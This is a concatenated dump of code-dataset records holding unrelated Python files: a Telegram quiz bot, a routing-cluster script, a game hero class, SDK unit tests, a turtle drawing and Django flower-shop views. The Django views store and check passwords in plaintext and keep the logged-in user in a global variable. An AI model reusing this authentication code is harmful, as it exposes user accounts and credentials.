self.tweepy.update_with_media(status=tweet, filename=image)\n\n","sub_path":"bitlibertad/twitter.py","file_name":"twitter.py","file_ext":"py","file_size_in_byte":1171,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"43755319","text":"\nimport config\nimport telebot, requests\nfrom telebot import types\nimport firebase_admin\nfrom firebase_admin import credentials\nfrom firebase_admin import db\n\n\n\ncred = credentials.Certificate(\"kasym.json\")\ndefault_app = firebase_admin.initialize_app(cred, {'databaseURL': 'https://grgrgrw-3bc83.firebaseio.com/'})\n\n\nbot = telebot.TeleBot(config.token)\n# Neoбычный режим\n@bot.message_handler(commands = ['start'])\n\ndef start(message):\n 
keyboard = types.ReplyKeyboardMarkup(row_width=1, resize_keyboard=True)\n keyboard.add(*[types.KeyboardButton(name) for name in ['Тарих', 'Физика', 'Биология','География']])\n msg = bot.send_message(message.chat.id, \"Салеметсизбе. Категория танданыз\", reply_markup = keyboard)\n bot.register_next_step_handler(msg, answer)\n\n@bot.message_handler(content_types = ['text'])\ndef answer(message):\n if message.text == \"Тарих\":\n keyboard = types.ReplyKeyboardMarkup(row_width=1, resize_keyboard=True)\n keyboard.add(*[types.KeyboardButton(question) for question in ['dada', 'baba', 'haha', 'gaga', 'fafa']])\n msg = bot.send_message(message.chat.id, \"Кандай суракты тандайсыз?\", reply_markup = keyboard)\n bot.register_next_step_handler(msg, answer_subject)\n if message.text == \"Физика\":\n keyboard = types.ReplyKeyboardMarkup(row_width=1, resize_keyboard=True)\n keyboard.add(*[types.KeyboardButton(question) for question in ['do', 'we', 'ba', 'ha', 'by']])\n msg = bot.send_message(message.chat.id, \"Кандай суракты тандайсыз?\", reply_markup = keyboard)\n bot.register_next_step_handler(msg, answer_subject)\n if message.text == \"Биология\":\n keyboard = types.ReplyKeyboardMarkup(row_width=1, resize_keyboard=True)\n keyboard.add(*[types.KeyboardButton(question) for question in ['dos', 'wes', 'bas', 'has', 'bys']])\n msg = bot.send_message(message.chat.id, \"Кандай суракты тандайсыз?\", reply_markup = keyboard)\n bot.register_next_step_handler(msg, answer_subject)\n if message.text == \"География\":\n keyboard = types.ReplyKeyboardMarkup(row_width=1, resize_keyboard=True)\n keyboard.add(*[types.KeyboardButton(question) for question in ['dosh', 'wesh', 'bash', 'hash', 'bysh']])\n msg = bot.send_message(message.chat.id, \"Кандай суракты тандайсыз?\", reply_markup = keyboard)\n bot.register_next_step_handler(msg, answer_subject)\n\n\n \n@bot.message_handler(content_types = ['text'])\ndef answer_subject(message):\n if message.text == 'dada':\n subject = db.reference('/Тарих/a/dada').get()\n bot.send_message(message.chat.id, subject)\n if message.text == 'baba':\n subject = db.reference('/Тарих/b/baba').get()\n bot.send_message(message.chat.id, subject)\n if message.text == 'haha':\n subject = db.reference('/Тарих/c/haha').get()\n bot.send_message(message.chat.id, subject)\n if message.text == 'gaga':\n subject = db.reference('/Тарих/d/gaga').get()\n bot.send_message(message.chat.id, subject)\n if message.text == 'fafa':\n subject = db.reference('/Тарих/e/dada').get()\n bot.send_message(message.chat.id, subject)\n \n\n \n \n \n\n'''\n@bot.message_handler(content_types=[\"text\"])\ndef any_msg(message):\n keyboard = types.InlineKeyboardMarkup()\n url_button = types.InlineKeyboardButton(text=\"Канал в YouTube\",url='https://www.youtube.com/channel/UC_cBsck6NyqzSDaNEfOJ5HQ' )\n url_button2 = types.InlineKeyboardButton(text=\"YouTube\",url='https://www.youtube.com')\n url_button3 = types.InlineKeyboardButton(text=\"Мой VK\",url='https://vk.com/id289417861')\n url_button4 = types.InlineKeyboardButton(text=\"Мой classroom\",url='https://classroom.google.com')\n keyboard.add(url_button, url_button2,url_button3, url_button4)\n bot.send_message(message.chat.id, \"Привет, подписывайся на меня в социальных сетях\", reply_markup=keyboard)\n\n@bot.message_handler(content_types=[\"text\"])\ndef geophone(message):\n bot.send_message(message.chat.id, \"Хочешь отправить мне свой телефон или местоположение? Отправь да или нет? 
\", reply_markup=keyboard)\n if message.text == \"да\":\n keyboard = types.ReplyKeyboardMarkup(row_width=1, resize_keyboard=True)\n button_phone = types.KeyboardButton(text=\"Отправить номер телефона\", request_contact=True)\n button_geo = types.KeyboardButton(text=\"Отправить местоположение\", request_location=True)\n keyboard.add(button_phone, button_geo)\n bot.send_message(message.chat.id, \"Отправь мне свой номер телефона или поделись местоположением, жалкий человечишка!\", reply_markup=keyboard)\n else:\n bot.send_message(message.chat.id, \"OK\", reply_markup=keyboard)\n\n\n \n\n\n\n\n\n\n\n \n\n keyboard = types.InlineKeyboardMarkup()\n if message.text=='привет':\n bot.send_message(message.chat.id, 'привет,как ваши дела?')\n if message.text == \"хорошо\":\n bot.send_message(message.chat.id, \"Quanyshtymyn!!\")\n bot.send_message(message.chat.id, 'Может вам понадобиться наши инлайн кнопки')\n if message.text == \"пока нет\":\n bot.send_message(message.chat.id, 'OK!!')\n elif message.text == 'давайте':\n keybord = telebot.types.InlineKeyboardMarkup()\n # bot.send_message(message.chat.id, 'Открываю https://classroom.google.com нажмите на ссылку')\n url_button = types.InlineKeyboardButton(text=\" k kaba kz\",url='https://www.youtube.com/channel/UC_cBsck6NyqzSDaNEfOJ5HQ'.format(message.text))\n url_button2 = types.InlineKeyboardButton(text=\"ютуб\",url='https://www.youtube.com'.format(message.text))\n url_button3 = types.InlineKeyboardButton(text=\"меня создал\",url='https://vk.com/id289417861'.format(message.text))\n url_button4 = types.InlineKeyboardButton(text='classroom',url='https://classroom.google.com'.format(message.text))\n keyboard.add(url_button,url_button2,url_button3,url_button4)\n \n elif message.text == 'открой мне ютуб':\n bot.send_message(message.chat.id, 'Открываю https://www.youtube.com нажмите на ссылку')\n '''\n\n\n\n\n\nif __name__ == '__main__':\n bot.polling(none_stop=True)\n","sub_path":"telegrambot.py","file_name":"telegrambot.py","file_ext":"py","file_size_in_byte":6718,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"384325474","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Nov 4 19:16:21 2017\n\n@author: Jay\n\"\"\"\n\nfrom sklearn.cluster import KMeans\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.patches as mpatches\nimport math\n\nN = 49\n\ndef parseData(filename):\n nodes = [];\n demands = [];\n typeOfData = \"data\"\n with open(filename) as f:\n for line in f:\n words = line.split(\" \")\n try:\n words.remove('')\n except:\n pass\n try:\n words.remove('\\t')\n except:\n pass\n try:\n words.remove('\\n')\n except:\n pass\n if typeOfData == \"data\":\n if words[0] == \"NAME\":\n name = words[-1].strip()\n if words[0] == \"NODE_COORD_SECTION\" or words[0] == \"NODE_COORD_SECTION\\n\":\n typeOfData = \"nodes\"\n elif typeOfData == \"nodes\":\n if words[0] == \"DEMAND_SECTION\" or words[0] == \"DEMAND_SECTION\\n\":\n typeOfData = \"demands\"\n else:\n nodes.append([float(words[1]),float(words[2])])\n elif typeOfData == \"demands\":\n if words[0] == \"DEPOT_SECTION\" or words[0] == \"DEPOT_SECTION\\n\":\n typeOfData = \"depot\"\n else:\n demands.append(float(words[1]))\n else:\n pass\n return name,nodes,demands\n\ndef createData(CVRPdatafile):\n name,nodes,demands = parseData(CVRPdatafile)\n fig = plt.figure()\n ax = fig.add_subplot(111)\n for i in range(len(nodes)):\n ax.text(nodes[i][0]+1,nodes[i][1]-1,str(i))\n ax.plot(nodes[i][0],nodes[i][1],\"*b\")\n X = 
np.array(nodes[1:])\n kmeans = KMeans(n_clusters=N, random_state=0).fit(X)\n clusters = []\n \n for nCluster in range(N):\n thisCluster = [];\n for i in range(len(kmeans.labels_)):\n if nCluster == kmeans.labels_[i]:\n thisCluster.append(i+1)\n clusters.append(thisCluster)\n \n clusters.insert(0,[0])\n \n clusterDemands=[];\n \n for cluster in clusters:\n totaldemand = 0;\n for customer in cluster:\n totaldemand += demands[customer]\n clusterDemands.append(totaldemand)\n \n \n strxy = str(nodes)\n strcl = str(clusters)\n strdem = str(clusterDemands)\n \n strxy = strxy.replace(\"[ \",\"[\")\n strxy = strxy.replace(\" \",\",\")\n strxy = strxy.replace(\",,\",\",\")\n strxy = strxy.replace(\"\\n\",\"\")\n \n strcl = strcl.replace(\"[ \",\"[\")\n strcl = strcl.replace(\" \",\",\")\n strcl = strcl.replace(\",,\",\",\")\n strcl = strcl.replace(\"\\n\",\"\")\n \n strdem = strdem.replace(\"[ \",\"[\")\n strdem = strdem.replace(\" \",\",\")\n strdem = strdem.replace(\",,\",\",\")\n strdem = strdem.replace(\"\\n\",\"\")\n \n text_file = open(name + \"-c\" + str(N) + \".dat\", \"w\")\n text_file.write(strxy + \"\\n\")\n text_file.write(strcl)\n text_file.write(\"\\n\")\n text_file.write(strdem)\n \n text_file.close()\n xy = np.array(nodes)\n \n for i in range(len(xy)):\n ax.plot(xy[i,0],xy[i,1],\"*b\")\n ax.text(xy[i,0]+1,xy[i,1]-1,str(i))\n depot = [xy[clusters[0],0],xy[clusters[0],1]]\n ax.add_patch(mpatches.Rectangle((depot[0] - 3, depot[1] -3), 6, 6, fill=False))\n \n for cluster in clusters[1:]:\n if len(cluster) == 1:\n circle1 = plt.Circle((xy[cluster[0],0],xy[cluster[0],1]), 3, fill = False)\n ax.add_artist(circle1)\n if len(cluster) == 2:\n centerX = (xy[cluster[0],0] + xy[cluster[1],0])/2\n centerY = (xy[cluster[0],1] + xy[cluster[1],1])/2\n xDist = np.sqrt((xy[cluster[0],0] - xy[cluster[1],0])**2 + (xy[cluster[0],1] - xy[cluster[1],1])**2)\n yDist = 0.5*(xDist+5)\n angle = math.atan((xy[cluster[0],1] - xy[cluster[1],1])/(xy[cluster[0],0] - xy[cluster[1],0]))\n ellipse1 = mpatches.Ellipse((centerX,centerY), xDist+5, yDist,np.rad2deg(angle),fill = False)\n ax.add_artist(ellipse1)\n if len(cluster) > 2:\n xData = [];\n yData = [];\n for point in cluster:\n xData.append(xy[point,0])\n yData.append(xy[point,1])\n x1 = min(xData); x2 = max(xData);\n y1 = min(yData); y2 = max(yData);\n x0 = (x1+x2)/2; y0 = (y1+y2)/2;\n avg_x = sum(element for element in xData)/len(xData)\n avg_y = sum(element for element in yData)/len(yData)\n \n x_diff = [element - avg_x for element in xData]\n y_diff = [element - avg_y for element in yData]\n # stddev = np.std(data2,axis=0)\n \n x_diff_squared = [element**2 for element in x_diff]\n slope = sum(x * y for x,y in zip(x_diff, y_diff)) / sum(x_diff_squared)\n # slope = (y2-y1)/(x2-x1)\n angle = math.atan(slope)\n xDist = 2*(x2 - x1)/math.cos(angle)\n yDist = 2*(y2 - y1)*math.cos(angle)\n if yDist == 0:\n yDist = 0.5*(xDist+5)\n ellipse1 = mpatches.Ellipse((x0,y0), xDist, yDist,np.rad2deg(angle),fill = False)\n ax.add_artist(ellipse1)\n\ncreateData('P-n50-k10.dat')","sub_path":"data/parse_CVRP_cluster.py","file_name":"parse_CVRP_cluster.py","file_ext":"py","file_size_in_byte":5287,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"301780245","text":"__author__ = 'Владимир'\n\nfrom enum import Enum\nimport models.inventory as inventory\nimport models.hit as hit\nfrom random import choice\n\n\nclass HeroAttribute(Enum):\n strength = 1\n agility = 2\n intelligence = 3\n\n\nclass Hero:\n def __init__(\n self,\n 
base_attribute: HeroAttribute,\n name='',\n base_strength=0,\n base_agility=0,\n base_intelligence=0,\n strength_per_level=0,\n agility_per_level=0,\n intelligence_per_level=0,\n base_damage=(0, 0),\n base_attack_time=1.7\n ):\n self.name = name\n self._level = 1\n\n self._base_attribute = base_attribute\n\n self._strength_per_level = strength_per_level if strength_per_level >= 0 else 0\n self._agility_per_level = agility_per_level if agility_per_level >= 0 else 0\n self._intelligence_per_level = intelligence_per_level if intelligence_per_level >= 0 else 0\n\n self._base_strength = base_strength if base_strength >= 0 else 0\n self._base_agility = base_agility if base_agility >= 0 else 0\n self._base_intelligence = base_intelligence if base_intelligence >= 0 else 0\n\n self._strength = base_strength\n self._agility = base_agility\n self._intelligence = base_intelligence\n\n self._base_damage = base_damage # TODO: add checks and limits\n self._base_attack_time = base_attack_time if base_attack_time > 0 else 1.7\n self._base_attack_speed = 100\n\n self._inventory = inventory.Inventory()\n\n self._effects = []\n\n self._damage = self._calculate_damage()\n\n @property\n def level(self) -> int:\n return self._level\n\n @level.setter\n def level(self, value: int):\n if value > 25:\n value = 25\n if value < 1:\n value = 1\n if self.level != value:\n self._change_hero_attributes(value - self.level)\n self._level = value\n\n def level_up(self):\n self.level += 1\n\n @property\n def strength_per_level(self) -> float:\n return self._strength_per_level\n\n @strength_per_level.setter\n def strength_per_level(self, value: float):\n if value < 0:\n value = 0\n delta = value * (self.level - 1) - self._strength_per_level * (self.level - 1)\n self._strength_per_level = value\n self._strength += delta\n\n @property\n def agility_per_level(self) -> float:\n return self._agility_per_level\n\n @agility_per_level.setter\n def agility_per_level(self, value: float):\n if value < 0:\n value = 0\n delta = value * (self.level - 1) - self._agility_per_level * (self.level - 1)\n self._agility_per_level = value\n self._agility += delta\n\n @property\n def intelligence_per_level(self) -> float:\n return self._intelligence_per_level\n\n @intelligence_per_level.setter\n def intelligence_per_level(self, value: float):\n if value < 0:\n value = 0\n delta = value * (self.level - 1) - self._intelligence_per_level * (self.level - 1)\n self._intelligence_per_level = value\n self._intelligence += delta\n\n @property\n def strength(self) -> float:\n return self._strength\n\n @property\n def agility(self) -> float:\n return self._agility\n\n @property\n def intelligence(self) -> float:\n return self._intelligence\n\n def _change_hero_attributes(self, factor: int):\n old_base_attr = self.base_attribute_value\n self._strength += factor * self.strength_per_level\n self._agility += factor * self.agility_per_level\n self._intelligence += factor * self.intelligence_per_level\n self._delta_damage_by_delta_base_attribute(self.base_attribute, old_base_attr, self.base_attribute_value)\n\n @property\n def base_attribute_value(self):\n return self._attribute_value(self.base_attribute)\n\n def _attribute_value(self, attr: HeroAttribute):\n if attr == HeroAttribute.strength:\n return self.strength\n elif attr == HeroAttribute.agility:\n return self.agility\n else:\n return self.intelligence\n\n @property\n def base_attribute(self) -> HeroAttribute:\n return self._base_attribute\n\n @base_attribute.setter\n def base_attribute(self, value: 
HeroAttribute):\n self._delta_damage_by_delta_base_attribute(\n self.base_attribute,\n self._attribute_value(self.base_attribute),\n self._attribute_value(value)\n )\n self._base_attribute = value\n\n def _delta_damage_by_delta_base_attribute(self, attr: HeroAttribute, old_value: float, new_value: float):\n if self.base_attribute == attr:\n delta = round(new_value - old_value)\n self._damage = (self._damage[0] + delta, self._damage[1] + delta)\n\n @property\n def base_strength(self) -> float:\n return self._base_strength\n\n @base_strength.setter\n def base_strength(self, value: float):\n if value < 0:\n value = 0\n self._delta_damage_by_delta_base_attribute(HeroAttribute.strength, self.base_strength, value)\n delta = value - self._base_strength\n self._strength += delta\n self._base_strength = value\n\n @property\n def base_agility(self) -> float:\n return self._base_agility\n\n @base_agility.setter\n def base_agility(self, value: float):\n if value < 0:\n value = 0\n self._delta_damage_by_delta_base_attribute(HeroAttribute.agility, self.base_agility, value)\n delta = value - self._base_agility\n self._agility += delta\n self._base_agility = value\n\n @property\n def base_intelligence(self) -> float:\n return self._base_intelligence\n\n @base_intelligence.setter\n def base_intelligence(self, value: float):\n if value < 0:\n value = 0\n self._delta_damage_by_delta_base_attribute(HeroAttribute.intelligence, self.base_intelligence, value)\n delta = value - self._base_intelligence\n self._intelligence += delta\n self._base_intelligence = value\n\n @property\n def base_attack_speed(self) -> int:\n return self._base_attack_speed\n\n @property\n def base_damage(self) -> (int, int):\n return self._base_damage\n\n @base_damage.setter\n def base_damage(self, value: (int, int)):\n delta1, delta2 = value[0] - self.base_damage[0], value[1] - self.base_damage[1]\n self._base_damage = value\n self._damage = (self._damage[0] + delta1, self._damage[1] + delta2)\n\n @property\n def base_attack_time(self) -> float:\n return self._base_attack_time\n\n @base_attack_time.setter\n def base_attack_time(self, value: float):\n if value <= 0:\n value = 1.7\n self._base_attack_time = value\n\n @property\n def damage(self) -> (int, int):\n return self._damage\n\n def _calculate_damage(self):\n delta = self.base_attribute_value\n\n return self._base_damage[0] + delta, self._base_damage[1] + delta\n\n def __repr__(self):\n return 'Hero: {0}\\nStrength{9}: {1} + {2}\\nAgility{10}: {3} + {4}\\nIntelligence{11}: {5} + {6}\\n' \\\n 'Damage: {7} - {8}'\\\n .format(\n self.name,\n self.strength, self.strength_per_level,\n self.agility, self.agility_per_level,\n self.intelligence, self.intelligence_per_level,\n self.damage[0],\n self.damage[1],\n '*' if self.base_attribute == HeroAttribute.strength else '',\n '*' if self.base_attribute == HeroAttribute.agility else '',\n '*' if self.base_attribute == HeroAttribute.intelligence else ''\n )\n\n def attack(self) -> hit.Hit:\n return hit.Hit(choice(range(self.damage[0], self.damage[1] + 1)))","sub_path":"models/hero.py","file_name":"hero.py","file_ext":"py","file_size_in_byte":7940,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"30449236","text":"import unittest\n\nimport vivialconnect\n\nfrom tests.common import BaseTestCase\nfrom tests.common import HTTMock\nfrom vivialconnect import Message\n\n\nclass MessageTest(BaseTestCase):\n def test_create_message(self):\n with HTTMock(\n self.response_content,\n body=self.load_fixture(\"message/message\"),\n 
headers={\"Content-type\": \"application/json\"},\n ):\n message = vivialconnect.Message({\"id\": 6242736})\n message.save()\n self.assertEqual(\"This is message\", message.body)\n\n def test_get_message(self):\n with HTTMock(\n self.response_content,\n body=self.load_fixture(\"message/message\"),\n headers={\"Content-type\": \"application/json\"},\n ):\n message = vivialconnect.Message.find(6242736)\n\n self.assertEqual(\"This is message\", message.body)\n self.assertEqual(\"received\", message.status)\n self.assertEqual(\"inbound\", message.direction)\n self.assertEqual(\"+12223334444\", message.from_number)\n self.assertEqual(\"+12223335555\", message.to_number)\n self.assertEqual(0, message.num_media)\n\n def test_update_message(self):\n with HTTMock(\n self.response_content,\n body=self.load_fixture(\"message/message\"),\n headers={\"Content-type\": \"application/json\"},\n ):\n message = vivialconnect.Message.find(6242736)\n with HTTMock(\n self.response_content,\n body=self.load_fixture(\"message/message\"),\n headers={\"Content-type\": \"application/json\"},\n ):\n message.save()\n\n def test_get_messages(self):\n with HTTMock(\n self.response_content,\n body=self.load_fixture(\"message/messages\"),\n headers={\"Content-type\": \"application/json\"},\n ):\n messages = vivialconnect.Message.find()\n self.assertEqual(2, len(messages))\n\n def test_count_messages(self):\n with HTTMock(\n self.response_content,\n body=self.load_fixture(\"message/count\"),\n headers={\"Content-type\": \"application/json\"},\n ):\n count = vivialconnect.Message.count()\n self.assertEqual(2, count)\n\n def test_create_attachment(self):\n with HTTMock(\n self.response_content,\n body=self.load_fixture(\"message/attachment\"),\n headers={\"Content-type\": \"application/json\"},\n ):\n attachment = vivialconnect.Attachment(6242737)\n attachment.size = 1024\n attachment.content_type = \"image/gif\"\n attachment.file_name = \"what.gif\"\n attachment.key_name = \"abcdee\"\n attachment.save()\n\n def test_get_attachment(self):\n with HTTMock(\n self.response_content,\n body=self.load_fixture(\"message/message\"),\n headers={\"Content-type\": \"application/json\"},\n ):\n message = vivialconnect.Message.find(6242736)\n\n with HTTMock(\n self.response_content,\n body=self.load_fixture(\"message/attachment\"),\n headers={\"Content-type\": \"application/json\"},\n ):\n attachment = message.attachment(6242737)\n\n self.assertEqual(\"image/gif\", attachment.content_type)\n self.assertEqual(1024, attachment.size)\n self.assertEqual(\"what.gif\", attachment.file_name)\n self.assertEqual(\"abcdee\", attachment.key_name)\n self.assertEqual(6242737, attachment.message_id)\n\n def test_update_attachment(self):\n with HTTMock(\n self.response_content,\n body=self.load_fixture(\"message/message\"),\n headers={\"Content-type\": \"application/json\"},\n ):\n message = vivialconnect.Message.find(6242736)\n\n with HTTMock(\n self.response_content,\n body=self.load_fixture(\"message/attachment\"),\n headers={\"Content-type\": \"application/json\"},\n ):\n attachment = message.attachment(6242737)\n with HTTMock(\n self.response_content,\n body=self.load_fixture(\"message/attachment\"),\n headers={\"Content-type\": \"application/json\"},\n ):\n attachment.save()\n\n def test_get_attachments(self):\n with HTTMock(\n self.response_content,\n body=self.load_fixture(\"message/message\"),\n headers={\"Content-type\": \"application/json\"},\n ):\n message = vivialconnect.Message.find(6242736)\n with HTTMock(\n self.response_content,\n 
body=self.load_fixture(\"message/attachments\"),\n headers={\"Content-type\": \"application/json\"},\n ):\n attachments = message.attachments()\n self.assertEqual(2, len(attachments))\n\n def test_count_attachments(self):\n with HTTMock(\n self.response_content,\n body=self.load_fixture(\"message/message\"),\n headers={\"Content-type\": \"application/json\"},\n ):\n message = vivialconnect.Message.find(6242736)\n with HTTMock(\n self.response_content,\n body=self.load_fixture(\"message/attachments_count\"),\n headers={\"Content-type\": \"application/json\"},\n ):\n count = message.attachments_count()\n self.assertEqual(2, count)\n\n def test_send_bulk_message(self):\n with HTTMock(\n self.response_content,\n body=self.load_fixture(\"message/send_bulk\"),\n headers={\"Content-Type\": \"application/json\"},\n ):\n message = Message()\n message.from_number = \"+16164320123\"\n message.to_numbers = [\"+16165444547\", \"+16165648990\"]\n message.body = \"Bulk Message Test\"\n bulk_id = message.send_bulk()\n\n self.assertIsNotNone(bulk_id)\n\n def test_raise_error_without_to_numbers_property(self):\n with HTTMock(\n self.response_content,\n body=self.load_fixture(\"message/send_bulk\"),\n headers={\"Content-Type\": \"application/json\"},\n ), self.assertRaises(ValueError):\n message = Message()\n message.from_number = \"+16164320123\"\n message.body = \"Bulk Message Test\"\n message.send_bulk()\n\n def test_get_bulk_messages(self):\n with HTTMock(\n self.response_content,\n body=self.load_fixture(\"message/bulk_messages\"),\n headers={\"Content-Type\": \"application/json\"},\n ):\n bulk_messages = Message.bulk_messages(\n \"ac84229f-86ca-5edb-a37b-df253a94dbcb\"\n )\n self.assertGreater(len(bulk_messages), 0)\n message = bulk_messages[0]\n self.assertEqual(message.body, \"Bulk Message Test\")\n self.assertEqual(message.message_type, \"local_sms\")\n\n def test_get_all_bulks(self):\n with HTTMock(\n self.response_content,\n body=self.load_fixture(\"message/bulks\"),\n headers={\"Content-Type\": \"application/json\"},\n ):\n bulks = Message.bulks()\n self.assertGreater(len(bulks), 0)\n\n sample_bulk = bulks[0]\n\n self.assertEqual(sample_bulk.errors, 0)\n self.assertGreater(sample_bulk.total_messages, 1)\n self.assertGreater(sample_bulk.processed, 1)\n\n def test_send_mms_without_body(self):\n with HTTMock(\n self.response_content,\n body=self.load_fixture(\"message/message_empty_body\"),\n headers={\"Content-type\": \"application/json\"},\n ):\n message = vivialconnect.Message()\n message.from_number = \"+12223334444\"\n message.to_number = \"12223335555\"\n message.media_urls = [\"http://www.sample-pic.com/sample.jpg\"]\n message.save()\n\n self.assertTrue(hasattr(message, \"body\") and message.body == \"\")\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","sub_path":"tests/test_message.py","file_name":"test_message.py","file_ext":"py","file_size_in_byte":7957,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"341984225","text":"# Complete the checkMagazine function below.\ndef checkMagazine(magazine, note):\n m = {}\n n = {}\n\n for word in magazine:\n if word not in m:\n m[word] = 1\n else:\n m[word] += 1\n\n for word in note:\n if word not in n:\n n[word] = 1\n else:\n n[word] += 1\n\n p = True\n for word in n:\n if word in m and m[word] >= n[word]:\n pass\n else:\n p = False\n break\n\n if p:\n return \"Yes\"\n return 
\"No\"","sub_path":"Hackerrank/interview_preparation/Dictionaries_and_hashmaps/randsom_notes.py","file_name":"randsom_notes.py","file_ext":"py","file_size_in_byte":526,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"176957412","text":"import turtle\nturtle.tracer(False)\nturtle.mode('logo')\nturtle.shape('turtle')\ni = 0\na = -35\ncolors = ['red', 'yellow', 'green', 'blue']# 定义颜色数组\nx = turtle.getcanvas().winfo_width()/2\ny = turtle.getcanvas().winfo_height()/2\n\n\ndef head(color):\n turtle.pu()\n turtle.goto(0, 50)\n turtle.fillcolor(color)\n turtle.begin_fill()\n turtle.pd()\n turtle.seth(-90)\n turtle.circle(80, 360)\n turtle.end_fill()# 定义画脸函数\n\n\n\nj = 7\nflag = True\n\n\ndef mouth():\n global j, flag\n turtle.pu()\n turtle.goto(0, -65)\n turtle.pd()\n turtle.seth(90)\n turtle.circle(40, 20 + j)\n turtle.pu()\n turtle.goto(0, -65)\n turtle.pd()\n turtle.seth(90)\n turtle.circle(40, -20-j)\n if j > 50 or j < 5:\n flag = not flag\n if flag == True:\n j = j + 3\n else:\n j = j - 3\n# 定义画嘴巴函数\n\n\ndef eye(a):\n turtle.pu()\n turtle.goto(-20, 0)\n turtle.pd()\n turtle.fillcolor('white')\n turtle.begin_fill()\n turtle.seth(0)\n turtle.circle(15, 360)\n turtle.end_fill()# 左眼眶\n \n turtle.pu()\n turtle.goto(50, 0)\n turtle.pd()\n turtle.fillcolor('white')\n turtle.begin_fill()\n turtle.seth(0)\n turtle.circle(15, 360)\n turtle.end_fill()# 右眼眶\n \n turtle.pu()\n turtle.goto(a, 0)\n turtle.pd()\n turtle.dot(3)\n turtle.pu()\n turtle.goto(a+70, 0)\n turtle.pd()\n turtle.dot(3)# 左眼珠+右眼珠\n\n\ndef emoji(color, a):\n turtle.clear()\n head(color)\n mouth()\n eye(a)# 定义整体函数\n\n\ndef change(x, y):\n global i\n i += 1\n if i > len(colors) - 1:\n i = 0\n emoji(colors[i], a)\n\n\ndef change_eye(event):\n if event.x-x > -300 and event.x-x< -100:\n emoji(colors[i], -45)\n elif event.x-x > 100 and event.x-x < 300:\n emoji(colors[i], -25)\n else:\n emoji(colors[i], -35)\n turtle.update()\n\nemoji(colors[i], -35)\n\nturtle.update()\nturtle.hideturtle()\nturtle.onscreenclick(change, btn=1)\n# 点击鼠标后调用函数emoji\n\ncv = turtle.getcanvas()\ncv.bind(\"\", change_eye)\n\nturtle.done()","sub_path":"example/test/T22_bianlian.py","file_name":"T22_bianlian.py","file_ext":"py","file_size_in_byte":2074,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"301010126","text":"from django.shortcuts import render, redirect\nfrom django.http import HttpResponse, HttpResponseRedirect\nfrom itertools import chain\nfrom django.contrib.auth import login, authenticate, logout\nfrom django.contrib.auth.decorators import login_required\nfrom django.urls import reverse\nfrom theApp.forms import *\nfrom theApp.models import *\nfrom django.db import connection\nfrom django.template.defaulttags import register\nimport random\n\ncurrentUser = \"empty\"\ncursor = connection.cursor()\n\n'''\n@register.filter\ndef editLink(link):\n return str(link).replace(\"/product/\",\"theApp/static/uploaded/\") + \".jpg\"\n'''\n\ndef user_logout(request):\n logout(request)\n return HttpResponseRedirect(reverse('theApp:index'))\n\ndef register(request):\n registered = False\n if request.method == 'POST':\n user_form = UserForm(data=request.POST)\n if user_form.is_valid():\n dataDic = user_form.cleaned_data\n print(dataDic)\n myUser.save(dataDic)\n registered = True\n else:\n print(user_form.errors)\n else:\n user_form = UserForm()\n return render(request,'registration.html',\n {'user_form':user_form,\n 'registered':registered})\n\ndef 
user_login(request):\n if request.method == 'POST':\n username = request.POST.get('username')\n password = request.POST.get('password')\n cursor.execute('Select password, id From theApp_myuser WHERE username = %s', [username])\n try:\n tmpTup = cursor.fetchall()[0]\n except:\n return HttpResponse(\"No such account.\")\n tmp = tmpTup[0]\n tmpid = tmpTup[1]\n if(password == tmp):\n print('success')\n global currentUser \n currentUser = tmpid\n return HttpResponseRedirect(reverse('theApp:index'))\n else:\n return HttpResponse(\"Your account was inactive.\")\n '''\n if user:\n if user.is_active:\n login(request,user)\n return HttpResponseRedirect(reverse('theApp:index'))\n else:\n return HttpResponse(\"Your account was inactive.\")\n else:\n print(\"Someone tried to login and failed.\")\n print(\"They used username: {} and password: {}\".format(username,password))\n return HttpResponse(\"Invalid login details given\")\n '''\n else:\n return render(request, 'login.html', {})\n\ndef registerProduct(request):\n registered = False\n if request.method == 'POST':\n flower_form = flowerForm(data=request.POST)\n if flower_form.is_valid():\n dataDic = flower_form.cleaned_data\n print(dataDic)\n fid = Flower.save(dataDic)\n stockDic = {}\n stockDic['flower_id'] = str(fid)\n stockDic['seller_id'] = currentUser\n stockDic['count'] = dataDic['stock_count']\n stockDic['sold'] = '0'\n print(\"CURRENT USER:\", currentUser)\n Stocks.save(stockDic)\n registered = True\n else:\n print(flower_form.errors)\n else:\n flower_form = flowerForm()\n return render(request,'registerProduct.html',\n {'flower_form':flower_form,\n 'registered':registered})\n\ndef easteregg(request):\n registered = False\n if request.method == 'POST':\n gizli_form = gizliForm(data=request.POST)\n if gizli_form.is_valid():\n dataDic = gizli_form.cleaned_data\n print(dataDic)\n Category.save(dataDic)\n registered = True\n else:\n print(gizli_form.errors)\n else:\n gizli_form = gizliForm()\n return render(request,'easteregg.html',\n {'gizli_form':gizli_form,\n 'registered':registered})\n\ndef deleteProduct(request):\n registered = False\n if request.method == 'POST':\n del_form = deletionForm(data=request.POST)\n if del_form.is_valid():\n dataDic = del_form.cleaned_data\n print(dataDic)\n tmp = cursor.execute('Select flower_id From theApp_flower WHERE flower_type = %s', [dataDic['name']]).fetchall()[0][0]\n Flower.delete(dataDic['name'],tmp)\n registered = True\n else:\n print(del_form.errors)\n else:\n del_form = deletionForm()\n return render(request,'deletion.html',\n {'del_form':del_form,\n 'registered':registered})\n\ndef changeProduct(request):\n registered = False\n if request.method == 'POST':\n price_form = updatePriceForm(data=request.POST)\n if price_form.is_valid():\n dataDic = price_form.cleaned_data\n print(dataDic)\n Flower.changePrice(dataDic['flower_type'],dataDic['price'])\n registered = True\n else:\n print(price_form.errors)\n else:\n price_form = updatePriceForm()\n return 